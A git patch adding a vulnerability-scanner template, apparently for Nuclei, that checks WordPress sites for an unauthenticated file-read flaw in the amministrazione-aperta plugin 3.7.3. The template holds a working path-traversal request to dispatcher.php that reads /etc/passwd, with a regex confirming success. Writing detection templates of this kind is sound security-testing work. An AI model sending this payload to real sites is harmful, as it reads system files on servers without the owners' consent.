From 613a5800aef51bcd10f9e4c882c694d12e6bcc12 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 29 Mar 2022 19:55:33 +0700 Subject: [PATCH] Create amministrazione-aperta-lfi.yaml --- .../wordpress/amministrazione-aperta-lfi.yaml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml diff --git a/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml b/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml new file mode 100644 index 0000000000..c3e28e1d05 --- /dev/null +++ b/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml @@ -0,0 +1,23 @@ +id: candidate-application-lfi + +info: + name: WordPress Plugin amministrazione-aperta 3.7.3 - Unauthenticated Local File Read + author: daffainfo,Splint3r7 + severity: high + reference: https://www.exploit-db.com/exploits/50838 + tags: wordpress,wp-plugin,lfi,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd' + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200